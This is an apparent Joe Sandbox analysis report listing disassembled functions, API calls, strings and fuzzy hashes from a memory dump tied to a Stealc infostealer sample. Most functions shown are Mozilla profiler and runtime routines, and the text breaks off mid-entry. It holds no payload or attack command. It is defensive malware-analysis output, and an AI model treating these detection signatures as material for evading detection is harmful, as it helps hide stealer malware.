Instruction Fuzzy Hash: 4DA13874A047058FDB14CF29C594B9AFBF1BF48308F55866AD49A9BB00E730BA95CF90

Function 6C1071A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6C106060: moz_xmalloc.MOZGLUE(00000024,6BECD897,00000000,?,00000000,?,?,6C105FCB,6C1079A3), ref: 6C106078

free.MOZGLUE(-00000001), ref: 6C1072F6
free.MOZGLUE(?), ref: 6C107311

Strings

Spliced unique strings, xrefs: 6C107340
Copied unique strings, xrefs: 6C107320
333s, xrefs: 6C107226
333s, xrefs: 6C10731B

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$moz_xmalloc
String ID: 333s$333s$Copied unique strings$Spliced unique strings
API String ID: 3009372454-760240034
Opcode ID: ebe0b1e038758ba4455b5e154c40e2b63622486845a688e21fa7412465fd8c69
Instruction ID: 9881a62ae3ecde13081e28cc58b8aa5a2d7edf94acde171afb9434f6a9fde1a4
Opcode Fuzzy Hash: ebe0b1e038758ba4455b5e154c40e2b63622486845a688e21fa7412465fd8c69
Instruction Fuzzy Hash: 43718475F002198FDB14CE69D89079DB7F2AF98308F25C12ED80AAB750DB35A946CBC0

Function 6C1214A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C1214C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C1214E2
GetCurrentThreadId.KERNEL32 ref: 6C121546
InitializeConditionVariable.KERNEL32(?), ref: 6C1215BA
free.MOZGLUE(?), ref: 6C1216B4

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: ea257b7b521b697930ace56843c985f609a0e7bf3cef21b5fa8aec0e29fb6c14
Instruction ID: 2246e62abcacafabaee2659ea8e444b00e702f8b48e3d4d1051918e863274032
Opcode Fuzzy Hash: ea257b7b521b697930ace56843c985f609a0e7bf3cef21b5fa8aec0e29fb6c14
Instruction Fuzzy Hash: CA61EF75A007409BDB21DF20C880BDEB7B1BF8A308F44851CED8A57701EB39E999CB91

Function 6C11C160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON

Download Yara Rule

APIs

fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C11C1F1
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C11C293
fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C11C29E

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: fgetc$memcpy
String ID:
API String ID: 1522623862-0
Opcode ID: cc35c6001412d41eae01677bff033375d2e4f8d11bb64fb884b3852e94091b7e
Instruction ID: fdf93a4b23dacd1f7f5b6916021e4d468866504fb81275c2fce91414a42d907c
Opcode Fuzzy Hash: cc35c6001412d41eae01677bff033375d2e4f8d11bb64fb884b3852e94091b7e
Instruction Fuzzy Hash: F161BF71A08614CFCB14DFA8D8A05AEBBB5FF4A324F154539E802A7B50C735A944CFA0

Function 6C119F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C119FDB
free.MOZGLUE(?,?), ref: 6C119FF0
free.MOZGLUE(?,?), ref: 6C11A006
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C11A0BE
free.MOZGLUE(?,?), ref: 6C11A0D5
free.MOZGLUE(?,?), ref: 6C11A0EB

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 713ff901a008f7ea6bd8b15376e0cb12f7e27b113927d9542496245482f599dc
Instruction ID: 3c4a2af5fbfab725ccd353afea1bcdaa5e8c883cff08206efb2fc7b518f3c415
Opcode Fuzzy Hash: 713ff901a008f7ea6bd8b15376e0cb12f7e27b113927d9542496245482f599dc
Instruction Fuzzy Hash: C16191755087419FC711CF18C48066AB7F5FFD8328F548669E8999BB02E731E98ACBC1

Function 6C11DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C11DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C11D38A,?), ref: 6C11DC6F
free.MOZGLUE(?,?,?,?,?,6C11D38A,?), ref: 6C11DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C11D38A,?), ref: 6C11DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C11D38A,?), ref: 6C11DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C11D38A,?), ref: 6C11DD4A

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: ead25739390aa5b00b0e043daa5042e6d8d25a6fa23e8f695a7489eaa94aea1a
Instruction ID: a8bf60c19ea01d8e97016bdaed270fb8aee2b09b195a64ae001d4cae8ea40335
Opcode Fuzzy Hash: ead25739390aa5b00b0e043daa5042e6d8d25a6fa23e8f695a7489eaa94aea1a
Instruction Fuzzy Hash: 5D416BB9A04605DFCB01DFA9C880A9AB7F5FF8D318B554569D945ABB10DB35FC00CB90

Function 6C106590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C0FFA80: GetCurrentThreadId.KERNEL32 ref: 6C0FFA8D
Part of subcall function 6C0FFA80: AcquireSRWLockExclusive.KERNEL32(6C14F448), ref: 6C0FFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C106727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C1067C8

Part of subcall function 6C114290: memcpy.VCRUNTIME140(?,?,6C122003,6C120AD9,?,6C120AD9,00000000,?,6C120AD9,?,00000004,?,6C121A62,?,6C122003,?), ref: 6C1142C4

Strings

data, xrefs: 6C106593

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data
API String ID: 511789754-2918445923
Opcode ID: b3df3889276e060bcca31e0a084b950d0c5907099b89f963dcfd1bb76c5d5b34
Instruction ID: 05196824dfebfabc2c5a07cebfb6ed132a67f6f1a2b3b6ed24b2603c01aaa46b
Opcode Fuzzy Hash: b3df3889276e060bcca31e0a084b950d0c5907099b89f963dcfd1bb76c5d5b34
Instruction Fuzzy Hash: 51D1D075B083448FD724DF24C851B9FB7E5AFD5308F10892DE58997B51EB30A889CB92

Function 6C10CA20 Relevance: 9.1, APIs: 6, Instructions: 82timesleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000001), ref: 6C10CA57
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C10CA69
Sleep.KERNEL32 ref: 6C10CADD
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C10CAEA
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C10CAF5
?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6C10CB19

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Time$Now@SleepStamp@mozilla@@V12@_$BaseDurationFromMilliseconds@PlatformStampTicksUtils@mozilla@@V01@@Value@mozilla@@
String ID:
API String ID: 432163150-0
Opcode ID: b67f4331db143fd62ac333b6d5316abcbc1b40b5de02d9ca644ffaecafd265d8
Instruction ID: 52c7fa3b117c2d63dee929541cb23d64ec31029e4296eab787c2ba46742fbd34
Opcode Fuzzy Hash: b67f4331db143fd62ac333b6d5316abcbc1b40b5de02d9ca644ffaecafd265d8
Instruction Fuzzy Hash: 85212871B046088BC304FB3898511AFF7B9FFC5349F408628E859A7680FF7095598B92

Function 6C11C810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON

Download Yara Rule

APIs

??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C11C82D
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C11C842

Part of subcall function 6C11CAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C13B5EB,00000000), ref: 6C11CB12

?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C11C863
std::_Facet_Register.LIBCPMT ref: 6C11C875

Part of subcall function 6C0FB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C13B636,?), ref: 6C0FB143

??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C11C89A
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C11C8BC

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 2745304114-0
Opcode ID: 9481949b42282b5e24a8cb874631ad860797a07e44b373fea0f3776f29188aec
Instruction ID: c7a2d8ffa1a61611395fa7dcf01cb7f00b59c6f5d28c871cebfe27b7228eb1b3
Opcode Fuzzy Hash: 9481949b42282b5e24a8cb874631ad860797a07e44b373fea0f3776f29188aec
Instruction Fuzzy Hash: 2111B671B042099FCB00FFA4D8D49AF7BB4EF8935CB004179E91697741EB349905DB91

Function 6C0FD5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C0CEB57,?,?,?,?,?,?,?,?,?), ref: 6C0FD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C0CEB57,?), ref: 6C0FD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C0CEB57,?), ref: 6C0FD673
free.MOZGLUE(?), ref: 6C0FD888

Strings

|Enabled, xrefs: 6C0FD81E

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: |Enabled
API String ID: 4142949111-2633303760
Opcode ID: 7a28f00e8ef03ad5c247fb04bfc7df6226adda9a3c75102dd1126d34ff61edd3
Instruction ID: 8b77629a6ab5308544cd33088bc1253abfc40a1183fdce287359b69a67a81baf
Opcode Fuzzy Hash: 7a28f00e8ef03ad5c247fb04bfc7df6226adda9a3c75102dd1126d34ff61edd3
Instruction Fuzzy Hash: 16A1F7B0A043588FDB11CF69C4907EEBBF1AF49318F14805DDCA96B741D735A986CBA1

Function 6C110180 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 151threadCOMMON

Download Yara Rule

APIs

free.MOZGLUE(?), ref: 6C110270
GetCurrentThreadId.KERNEL32 ref: 6C1102E9
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C1102F6
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C11033A

Strings

about:blank, xrefs: 6C11020F

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThreadfree
String ID: about:blank
API String ID: 2047719359-258612819
Opcode ID: 4daef79122cdded92ec4035fca1ce7c97ea1036ed2ce2609561bc3b562b3c0df
Instruction ID: bda164cc0ce5cf051d8b128a0cd09a55cc08a9639be1efe9895bfa0fdac21627
Opcode Fuzzy Hash: 4daef79122cdded92ec4035fca1ce7c97ea1036ed2ce2609561bc3b562b3c0df
Instruction Fuzzy Hash: 1151AF75E042198FCB00EF58C480A9EB7F1FF89328F258569D82AA7B40D735F956CB90

Function 6C10E100 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C10E12F
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,6C10E084,00000000), ref: 6C10E137

Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508

?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE ref: 6C10E196
?profiler_stream_json_for_this_process@baseprofiler@mozilla@@YA_NAAVSpliceableJSONWriter@12@N_N1@Z.MOZGLUE(?,?,?,?,?,?,?,?), ref: 6C10E1E9

Part of subcall function 6C1099A0: GetCurrentThreadId.KERNEL32 ref: 6C1099C1
Part of subcall function 6C1099A0: AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C1099CE
Part of subcall function 6C1099A0: ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C1099F8

Strings

[I %d/%d] WriteProfileToJSONWriter, xrefs: 6C10E13F

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: getenv$?profiler_stream_json_for_this_process@baseprofiler@mozilla@@CurrentExclusiveLockSpliceableThreadWriter@12@$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] WriteProfileToJSONWriter
API String ID: 2491745604-3904374701
Opcode ID: 13309d005417d3016f9a9e32eddb54b01cfd5b594d2ed2ab3830f0192628fcd3
Instruction ID: 52933beb08229e940a88cdedf10371fffb7107decb83b30eb4b45a708fdc4b2a
Opcode Fuzzy Hash: 13309d005417d3016f9a9e32eddb54b01cfd5b594d2ed2ab3830f0192628fcd3
Instruction Fuzzy Hash: DE31F2B1B047009BC700EF6984553AAFBE5AFDA20CF15852DE8995BB41DF70DA09C7D2

Function 6C0FF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C0FF480

Part of subcall function 6C0CF100: LoadLibraryW.KERNEL32(shell32,?,6C13D020), ref: 6C0CF122
Part of subcall function 6C0CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C0CF132

CloseHandle.KERNEL32(00000000), ref: 6C0FF555

Part of subcall function 6C0D14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C0D1248,6C0D1248,?), ref: 6C0D14C9
Part of subcall function 6C0D14B0: memcpy.VCRUNTIME140(?,6C0D1248,00000000,?,6C0D1248,?), ref: 6C0D14EF

Part of subcall function 6C0CEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C0CEEE3

CreateFileW.KERNEL32 ref: 6C0FF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C0FF523

Strings

\oleacc.dll, xrefs: 6C0FF4CB

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: a6643ddd531a01f6cf8f59e7beba515dacbb0e4d3215f89d442fb64f99bb5cea
Instruction ID: e7d1e4ac92cf86e59c39533d08cff1e79f19c5744875eeaf6c57859b1f7812f4
Opcode Fuzzy Hash: a6643ddd531a01f6cf8f59e7beba515dacbb0e4d3215f89d442fb64f99bb5cea
Instruction Fuzzy Hash: 5441C9706087109FD721DF68C844B9FB7F8AF45718F504A1CFAA493650EB74E589CB92

Function 6C100210 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(?), ref: 6C100222
moz_xmalloc.MOZGLUE(0000000C), ref: 6C100231

Part of subcall function 6C0DCA10: malloc.MOZGLUE(?), ref: 6C0DCA26

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C10028B
RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 6C1002F7

Strings

@, xrefs: 6C1002D8

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ExclusiveLock$AcquireFreeHeapReleasemallocmoz_xmalloc
String ID: @
API String ID: 2782572024-2766056989
Opcode ID: ea0efba92ab25dc1c4f7636c8a69d87e424f3627de5b53eccf99298cab7721f5
Instruction ID: 4e526aba7f540f0f7e5455a0b56620edc9ab00a2912f1cfad001f6bb44de7cf0
Opcode Fuzzy Hash: ea0efba92ab25dc1c4f7636c8a69d87e424f3627de5b53eccf99298cab7721f5
Instruction Fuzzy Hash: 89319CB1B006518FEB54DF58C880B2AB7F1EF54318B29852DD95AEBB41DB31ED01CB81

Function 6C10E020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C0D4A68), ref: 6C10945E
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C109470
Part of subcall function 6C109420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C109482
Part of subcall function 6C109420: __Init_thread_footer.LIBCMT ref: 6C10949F

GetCurrentThreadId.KERNEL32 ref: 6C10E047
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C10E04F

Part of subcall function 6C1094D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C1094EE
Part of subcall function 6C1094D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C109508

free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C10E09C
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C10E0B0

Strings

[I %d/%d] profiler_get_profile, xrefs: 6C10E057

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: getenv$free$CurrentInit_thread_footerThread__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [I %d/%d] profiler_get_profile
API String ID: 1832963901-4276087706
Opcode ID: 26986f44875605b82762470f1eeb79a5dd1551d525148a9cf6cf28d26fad1291
Instruction ID: 784e90ef7bee619666923277751b909e8e41a01f296842f469d037ca9156b22d
Opcode Fuzzy Hash: 26986f44875605b82762470f1eeb79a5dd1551d525148a9cf6cf28d26fad1291
Instruction Fuzzy Hash: F721B074B011088FDF00EF65D868AAEBBB5AF9920CF544024ED4A97740DF31EA09CBA1

Function 6C1274A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C127526
__Init_thread_footer.LIBCMT ref: 6C127566
__Init_thread_footer.LIBCMT ref: 6C127597

Strings

UnmapViewOfFile2, xrefs: 6C127552
kernel32.dll, xrefs: 6C127557

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: b15012a4314a41fff666871e01c5908c68aea9ae3bd94bb841b84f7eb84eb96a
Instruction ID: 92393385184976a028b0e51d8b4ed348a961e8858dd7f4bf8afe605aabb69684
